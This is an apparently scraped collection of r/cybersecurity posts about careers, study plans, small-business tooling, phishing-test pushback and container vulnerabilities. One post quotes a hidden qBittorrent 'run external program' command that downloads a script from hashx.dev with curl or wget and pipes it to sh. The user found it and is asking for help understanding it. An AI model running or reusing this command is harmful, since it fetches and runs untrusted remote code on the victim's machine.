cybersecurity

The original post: /r/cybersecurity by /u/arnaudsm on 2024-11-06 21:13:28.

The original post: /r/cybersecurity by /u/Guilty_Being_337 on 2024-11-06 20:50:53.

Pretty much as the title says I also graduate with an associates cyber degree at the end of the year. I’m going to start applying for cyber jobs just wondering what job market is like and what I can expect.

The original post: /r/cybersecurity by /u/Erica_Blackmere on 2024-11-06 18:59:57.

With the year quickly coming to a close, I’m curious to hear from other cyber leaders: Are you planning to make any key hires before year-end?

I work in the cyber division of a technical recruitment agency, and I've noticed that this time of year can hit or miss. Some teams ramp up to meet end-of-year goals, while others are already setting their sights on growth for the new year.

What’s your approach? Are you bringing on new talent now or holding off until after the holiday season? Have you faced any unexpected hiring challenges recently?

Would love to hear your thoughts and experiences!

The original post: /r/cybersecurity by /u/Enough_Cell_8123 on 2024-11-06 20:35:42.

I'm a cybersecurity student in my third year however, the first two years were more computer science focused and this year we specialize in the cybersecurity field. I have to carry out a project, however I'm in a dilemma. I want to start off by saying I have a big interest in red teaming and was thinking of doing a pen testing project on IoT devices. My plan was as follows:

Step 1 - Decide what devices to test (between 1-3 devices).

Step 2 - Gather information on chosen IoT devices, and known vulnerabilities.

Step 3 -Obtain some INEXPENSIVE devices.

Step 4 - Figure out what tools and techniques will be required for each device.

Step 5 - Conduct experiments and analyze results

Step - 6 Report results.

I was hoping for some outsider opinions on whether this is a good idea for a project as a student in their third year. I'm also conflicted about what devices I should choose, and some recommendations would be greatly appreciated, along with how to find out common vulnerabilities for these devices.

If there's any other great project ideas that you think i should do instead please let me know, all feedback is greatly appreciated!

The original post: /r/cybersecurity by /u/Cerealbox2000 on 2024-11-06 20:18:16.

Working pro Bono to support new tech (mainly device things but also SaaS) for a Dutch incubator/accelerator.

We would like to improve their knowledge of security and what to do and consider as they build their product.

What topics should we talk about and teach (through cybersec professionals as applicable)

The original post: /r/cybersecurity by /u/arqf_ on 2024-11-06 19:42:02.

The original post: /r/cybersecurity by /u/Cultural-Pause-7860 on 2024-11-06 19:30:47.

Not really sure which one to chose. I know a little of ethical hacking. i'm not a complete beginner. but i'm just not sure which one is best to get to start doing bounties or potentially a job.

The original post: /r/cybersecurity by /u/SnooBeans6199 on 2024-11-06 19:29:15.

I am a veteran with my BS in Cybersec, Sec+, and two weeks into my Masters. I have been applying to jobs for a month (thats nothing), but pretty much every application has been rejected. After reading on reddit, I am honestly more discouraged than ever. I feel lied to, 3 years ago I was told this was one of the best careers to get into, and was a no brainer as I have been a hobbyist for about 14 years. I truly feel I should have went and continued in the electrical field or similar which is what I did in the military. I absolutely hate the thought that if I were to be laid off in this field, it may take a year to find another job. I'm thinking about stopping the Masters because I seriously think it may be pointless and actually a waste of my time.

The original post: /r/cybersecurity by /u/lightscream on 2024-11-06 19:19:04.

Landed SOC job recently and studying to go to threat hunting and DFIR in future, do I need to learn windows services for it? how they work, their dependencies common vulnerabilities or etc and do I need to know every core service? also how would you recommend me to study it, viewed recent posts like this and answers weren’t that clear, I would love more step by step things rather than just 10 links each with whole big website on it where you don’t even know from where you should start from, currently learning some services and deploying w10 vm to get some hands on experience on playing with services, using sysmon and etc. Would love to hear your recommendations

The original post: /r/cybersecurity by /u/eggsavage45 on 2024-11-06 19:13:53.

Doing some cybersecurity consulting work on the side for small businesses (less than 6 endpoints per business)

And was looking into the effectiveness of Microsoft Business Premium as an all in one solution for the business’s security needs.

Most of my clients are small mom and pop shops with little if not zero security. I currently use defender E5 at my main job (mainly for DLP access controls and purview that’s about it) so would Business Premium take care of everything a small businesses would need security wise?

Mainly looking to implement:

Email warning tags Phishing email detection and remediation Block user logins from foreign countries Antivirus/antimalware

The original post: /r/cybersecurity by /u/Vitglance on 2024-11-06 18:36:36.

When it comes to CyberSecurity, I know enough to know that I don't know enough.

I'm aware that a truly dedicated malicious actor could tell you how you like your coffee through mspaint 10 years ago, but what about a less dedicated malicious actor? The piercing gaze of Sauron seems unavoidable these days, but, how does one avoid standing out to the casual scanning glance of Sauron?

If you had worried friends in dangerous places, what would you tell them?

The original post: /r/cybersecurity by /u/No-Description-2993 on 2024-11-06 18:22:11.

I’ve got a final round interview coming up for an entry-level security role at Texas Instruments and I’d be super grateful for any tips or insights! This is my last shot in the process and I’ve struggled with final rounds before. To prep, I scheduled several mock interviews to help with my nerves and responses.

Is there anything else I should focus on to make sure I’m fully prepared? I really want this position just as much as the other candidates do and I’m ready to put in the work.

The original post: /r/cybersecurity by /u/JCTopping on 2024-11-06 18:02:30.

The original post: /r/cybersecurity by /u/Acrobatic_Idea_3358 on 2024-11-06 17:11:31.

I just randomly noticed a strange thing, I thought that the checkbox is enabled and the command is empty, but then I noticed on the far end a strange "sh -c", which revealed a whole command, sneakily padded by empty spaces. What is it, what does it do and why is it there?

Note that I just installed qBittorrent on a NAS in Docker recently and I have not actively added this command.

https://preview.redd.it/y15dwxpoq9zd1.png?width=685&format=png&auto=webp&s=2b97039e631671a8fd2785f5a7b5ab898f644ecf

The command reads:

sh -c "(curl -skL https://hashx.dev || wget --no-check-certificate -qO - https://hashx.dev) | sh"

The original post: /r/cybersecurity by /u/Intrepid_Pear6960 on 2024-11-06 17:05:56.

Hello all, part of our policy includes conducting risk management reviews on any 3rd party software we utilize. Currently i track how many we conduct each quarter, their risk level and importance to the company. Are there any other metrics anyone could recommend collecting on this process? This is something our internal auditors spend alot of time picking at and what to see more data but i cant come up with any more info that's easy to provide them with.

The original post: /r/cybersecurity by /u/ecry_ on 2024-11-06 16:27:45.

We have been given a task in my cybersecurity class. As shown by the nmap scan we have info about the OS, we do know it is a VM and we have the ipv6 and 4 address. (Also the gateway) So far my closest guess has been a SMBv3 vulnerability (SMBghost) as I think it is running SMB 3.1.1 on port 455. I have tried exploiting it through metasploit on kali but the modules on there aren’t working. The tutor told us the port 135 isn’t the one we have to exploit so it is either one between 139 and 455 but I have no other clues on how to proceed. The other CVEs I found about the 21h2 version of win10 don’t seem exploitable or I just don’t have the skill to execute them yet. You guys have any ideas?

The original post: /r/cybersecurity by /u/silentlycontinue on 2024-11-06 15:48:21.

Greetings,

I found that about 95% of failed remote VPN login traffic, about 5k daily monitored IPs, was caused by 2 subnets that seem to be managed by the same company or ISP; a /18 and a /19. The IPs rotated too frequently, each IP only making 2 login attempts, for the threat-detection authentication service to automatically shun them. So I blocked the ranges with a block list instead.

Should I submit those ranges to an Open Threat Exchange, or other threat intel service, along with an explanation of what I was seeing on the firewall? Or are such distributed brute force attacks so frequent that it would not be of interest?

_Silently

The original post: /r/cybersecurity by /u/draco_1000 on 2024-11-06 13:16:03.

I have been reading RINSED, TRACKERS IN THE DARK, the company chain analysis does come up quite a lot and does most of the bitcoin blockchain cybercrime investigations , how can we get into this and learn more about how to do what they do?

The original post: /r/cybersecurity by /u/Parrra on 2024-11-06 12:17:58.

Looking for some advice here. As a little bit of relevant background, the organisation I work for has only just formed a cyber security team. So they are very early on in their maturity in this space.

I have recently started some planned work to engage users in my organisation with security awareness training. This plan was approved by our CEO plus an external risk board we report to. As part of this, and working with a vendor, we conducted a baseline simulated phishing test. We followed all vendor advice and let the IT support staff it was happening. Well everything blew up at this point.

There were IT support staff from all different areas of the business complaining about user impacts. There were some IT staff undermining the process by contacting all their users and warning them. There were other middle management staff disagreeing with the entire approach in chats which include the entire IT team, stoking the fire even more. In the end the baseline data is totally inaccurate as around a third of our staff got personal warnings about the simulated test and were told to delete it.

What’s the best approach to try and change the culture of the greater IT team to try and accept what cyber is trying to do and get them onboard and working together, instead of seeing it as a huge pain and activity working against it.

The original post: /r/cybersecurity by /u/cloudxiao on 2024-11-06 07:19:41.

Hi guys. I'm curious to know how you all go about ensuring the security of your mobile applications. Whether you're a developer, product manager, or part of an app security team, I'm interested in the different tools, methods, or frameworks you might use to check and maintain app security.

Do you have any go-to tools or best practices for conducting vulnerability scans, securing data, or testing for common threats like malware or unauthorized access? If you've found a particular solution or workflow effective, I'd love to hear more about it.

Thanks.

The original post: /r/cybersecurity by /u/SnooCrickets2192 on 2024-11-06 04:38:46.

Hello, I'm new to the cybersecurity community. I am considering doing cybersecurity as my major/degree in college, but I want to get some knowledge first. The only thing I know about cybersecurity right now is to not share your password online. I was thinking about doing an online boot camp for cybersecurity to get some basic knowledge before I head off to college. I'm not looking for a job currently, just wanted to get some knowledge before I head to college and start class. If boot camp gets too expensive currently, where should I start?

The original post: /r/cybersecurity by /u/Wizkidbrz on 2024-11-05 16:57:48.

This has been a hot topic at my job recently as we started adopting containers.

How is everyone handling container vulnerabilities?

We are scanning these 3rd party container images and are finding some high/critical vulnerabilities in them.

The application owners are giving us push back on getting them fixed because they rely on the vendor to update their container imagine and that is not an easy ask.

The original post: /r/cybersecurity by /u/No_excuses0101 on 2024-11-06 01:01:42.

Has anyone come across a mapping of DORA (Digital operational resilience act) to standards like NIST, ISO2700, ISF SoGP, NIS2 or PCI DSS please?

The original post: /r/cybersecurity by /u/Sctman1 on 2024-11-06 00:43:17.

Anyone here work in cyber claims? Pros/cons? Been in more typical cyber roles like SLP, GRC, audit and security awareness for the past 5 years and thinking about moving.

The original post: /r/cybersecurity by /u/Terminator2OnDVD on 2024-11-05 23:05:30.

Hello guess it’s my turn to make a post in here. I currently work as an IT Security Compliance Manager (5 years of experience)but have decided to switch to it risk management in around 6 months, currently studying CRISC to support this transition.

Aiming to be an extremely good Risk manager in 2 years, what areas, certs, tech etc would you guys recommend me to focus on to achive this and why?

Thanks in advance.